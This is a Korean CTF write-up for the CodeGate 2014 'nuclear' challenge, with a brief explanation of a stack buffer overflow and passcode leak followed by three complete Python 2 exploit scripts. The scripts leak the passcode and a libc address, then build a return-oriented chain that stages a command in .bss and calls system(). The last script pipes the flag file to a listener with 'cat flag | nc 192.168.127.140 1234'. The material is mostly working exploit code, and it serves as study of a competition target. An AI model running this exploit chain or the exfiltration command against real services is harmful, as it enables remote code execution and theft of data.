
[CodeGate 2014 CTF] nuclear

woodonggyu 2016. 4. 19. 20:38

 

buf 의 크기는 512byte 이지만 recv 함수를 통해 1298byte 만큼 입력받아 overflow 취약점이 존재한다.

 

 

해당 취약점이 존재하는 함수로 이동하기 위해 passcode 를 알아내야 한다. passcode 는 v5, v4 두 값을 널바이트 없이 이어 붙인 것이므로, 앞의 buf 를 끝까지(512byte) 채워 널 종료가 사라지게 하면 서버가 buf 를 돌려줄 때 뒤에 붙은 v5, v4 가 함께 딸려 나온다. `__isoc99_sscanf(&buf, "%f/%f", v5, v4);` 로 파싱되는 두 값이 바로 이 passcode 이며, 이를 이용하면 passcode 를 leak 할 수 있다.

 

 

- - - - - - - - - - - - - - - - - - - -   passcode_leak.py - - - - - - - - - - - - - - - - - - - - -

 

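from socket import *
from struct import *
import time

# passcode_leak.py -- Python 2 script (socket payloads are plain str; under
# Python 3 every literal sent or sliced here would have to be bytes).
#
# Stage 1 of the CodeGate 2014 "nuclear" exploit: recover the passcode that is
# stored directly after the 512-byte `buf`.  All of `buf` is filled with "A"
# so no NUL terminator is left inside it; when the service sends the buffer
# back, the reply runs on into the adjacent passcode fields.  (Inferred from
# the writeup and the 542-byte offset below -- confirm against the binary.)

TARGET = ('192.168.127.140', 1129)
BUF_SIZE = 512          # size of the overflowable stack buffer
PASSCODE_OFFSET = 542   # where the passcode starts in the final reply (empirical)
RECV_TIMEOUT = 5.0      # seconds; keeps the drain loop from hanging on a quiet peer

up = lambda x: unpack("<L", x)[0]


def recv_at_least(sock, n, bufsize=1024):
    """Read from `sock` until at least `n` bytes have been collected.

    A single recv() may return fewer bytes than the peer sent, which would
    silently truncate the leak when slicing at PASSCODE_OFFSET.  Reading stops
    early on EOF or when the socket timeout expires; whatever was collected is
    returned either way, so the caller must still check the length.
    """
    chunks = []
    got = 0
    while got < n:
        try:
            chunk = sock.recv(bufsize)
        except timeout:
            break
        if not chunk:
            break
        chunks.append(chunk)
        got += len(chunk)
    return "".join(chunks)


def step(sock, line):
    """Send one newline-terminated line, print the reply, then pause.

    The 1-second pause after each reply mirrors the original pacing; the
    service appears to need it between prompts (not verified).
    """
    sock.send(line + "\n")
    print(sock.recv(1024))
    time.sleep(1)


s = socket(AF_INET, SOCK_STREAM)
s.connect(TARGET)
s.settimeout(RECV_TIMEOUT)
try:
    # Banner.
    print(s.recv(1024))
    time.sleep(1)

    step(s, "target")
    # Input for the "%f/%f" sscanf; the numeric values themselves do not
    # matter for the leak.
    step(s, "123.123123/123.123123")
    # Fill buf completely so the echoed buffer is not NUL-terminated.
    step(s, "A" * BUF_SIZE)

    print("[*] leak passcode!!")
    reply = recv_at_least(s, PASSCODE_OFFSET + 1)
    if len(reply) <= PASSCODE_OFFSET:
        print("[-] reply too short (%d bytes), nothing at offset %d"
              % (len(reply), PASSCODE_OFFSET))
    else:
        print("[*] passcode = " + reply[PASSCODE_OFFSET:])
finally:
    # Always release the connection, even if the service drops us mid-way.
    s.close()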

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 

 

- - - - - - - - - - - - - - - - - - - -  libc_leak.py - - - - - - - - - - - - - - - - - - - - -

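from socket import *
from struct import *
import time

# libc_leak.py -- Python 2 script (socket payloads are plain str).
#
# Stage 2 of the CodeGate 2014 "nuclear" exploit: return into send@plt with
# send's own GOT entry as the buffer, so the service sends us the resolved
# address of send() inside libc.  system() is then located with a fixed
# offset that is specific to the target's libc build.

TARGET = ('192.168.127.140', 1129)
RECV_TIMEOUT = 5.0      # seconds; fail loudly instead of hanging forever

p = lambda x: pack("<L", x)
up = lambda x: unpack("<L", x)[0]

send_plt = 0x08048900
send_got = 0x0804b07c
p4ret = 0x0804917c       # gadget assumed (from its name) to pop 4 dwords then ret
offset = 0xfd0           # system - send in the target libc; other builds differ
CLIENT_FD = 4            # descriptor of our connection inside the service (assumed)
PAD = 528                # bytes from the start of buf to the saved return address

# Fill in with the value recovered by passcode_leak.py.
passcode = "what is passcode?"

# Overflow -> send(CLIENT_FD, send_got, 4, 0).  p4ret sits in send()'s
# return slot so execution does not fall into the argument values afterwards
# (the process is expected to die after the leak; that is fine here).
payload = "A" * PAD
payload += p(send_plt)
payload += p(p4ret)
payload += p(CLIENT_FD)
payload += p(send_got)
payload += p(4)
payload += p(0)


def recv_exact(sock, n):
    """Read exactly `n` bytes from `sock` or raise EOFError.

    recv(n) may legitimately return fewer bytes than requested; unpacking a
    short read as a 4-byte address would silently yield a wrong libc address.
    """
    data = ""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes"
                           % (len(data), n))
        data += chunk
    return data


s = socket(AF_INET, SOCK_STREAM)
s.connect(TARGET)
s.settimeout(RECV_TIMEOUT)
try:
    # Banner.
    print(s.recv(1024))
    time.sleep(1)

    s.send("launch" + "\n")
    print(s.recv(1024))

    s.send(passcode + "\n")
    print(s.recv(1024))

    s.send(payload + "\n")
    print(s.recv(1024))

    # The injected send() writes the 4-byte GOT entry to our socket.
    send_libc = up(recv_exact(s, 4))
    system_libc = send_libc + offset

    # NOTE: exploit.py hard-codes system_libc.  If the target has ASLR this
    # value is only valid for the connection it was leaked in, and the leak
    # has to be redone in the same session as the final payload.
    print("[*] leak libc!!")
    print("[*] send_libc = " + hex(send_libc))
    print("[*] system_libc = " + hex(system_libc))
finally:
    s.close()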

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 

- - - - - - - - - - - - - - - - - - - - - - exploit.py - - - - - - - - - - - - - - - - - - - - -

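from socket import *
from struct import *
import time

# exploit.py -- Python 2 script (socket payloads are plain str).
#
# Stage 3 of the CodeGate 2014 "nuclear" exploit: recv(CLIENT_FD, bss,
# len(cmd), 0) stages the shell command into .bss, p4ret discards the four
# arguments, and execution returns into system(bss).

TARGET = ('192.168.127.140', 1129)
RECV_TIMEOUT = 5.0      # seconds; the service need not answer once system() runs

p = lambda x: pack("<L", x)
up = lambda x: unpack("<L", x)[0]

recv_plt = 0x080488e0
p4ret = 0x0804917c          # gadget assumed (from its name) to pop 4 dwords then ret
# Value printed by libc_leak.py.  With ASLR enabled it is only valid for the
# connection it was leaked in and the leak must be redone in this session.
system_libc = 0xb76eb210
bss = 0x0804b088            # writable scratch area at a fixed address for the command
CLIENT_FD = 4               # descriptor of our connection inside the service (assumed)
PAD = 528                   # bytes from the start of buf to the saved return address

# The receiver for the exfiltrated flag (e.g. `nc -lvp 1234` on that address)
# must be listening before the command runs, otherwise the output is lost.
cmd = "cat flag | nc 192.168.127.140 1234"
# Fill in with the value recovered by passcode_leak.py.
passcode = "what is passcode?"

payload = "A" * PAD
# recv(CLIENT_FD, bss, len(cmd), 0): read exactly the command bytes into
# .bss.  The trailing "\n" of the line we send is deliberately left unread so
# it does not become part of the command; the string relies on the bytes
# following it in .bss being zero so system() sees a terminated string.
payload += p(recv_plt)
payload += p(p4ret)
payload += p(CLIENT_FD)
payload += p(bss)
payload += p(len(cmd))
payload += p(0)
# system(bss).  The return address after system() is junk; the process may
# crash afterwards, which no longer matters once the command has run.
payload += p(system_libc)
payload += "AAAA"
payload += p(bss)


s = socket(AF_INET, SOCK_STREAM)
s.connect(TARGET)
s.settimeout(RECV_TIMEOUT)
try:
    # Banner.
    print(s.recv(1024))
    time.sleep(1)

    s.send("launch" + "\n")
    print(s.recv(1024))

    s.send(passcode + "\n")
    print(s.recv(1024))

    s.send(payload + "\n")
    print(s.recv(1024))

    # Consumed by the injected recv() call, which reads len(cmd) bytes.
    s.send(cmd + "\n")
    try:
        print(s.recv(1024))
    except timeout:
        # No reply is expected once system() runs; a silent peer is not an error.
        print("[*] no reply after command (expected)")
finally:
    s.close()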

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -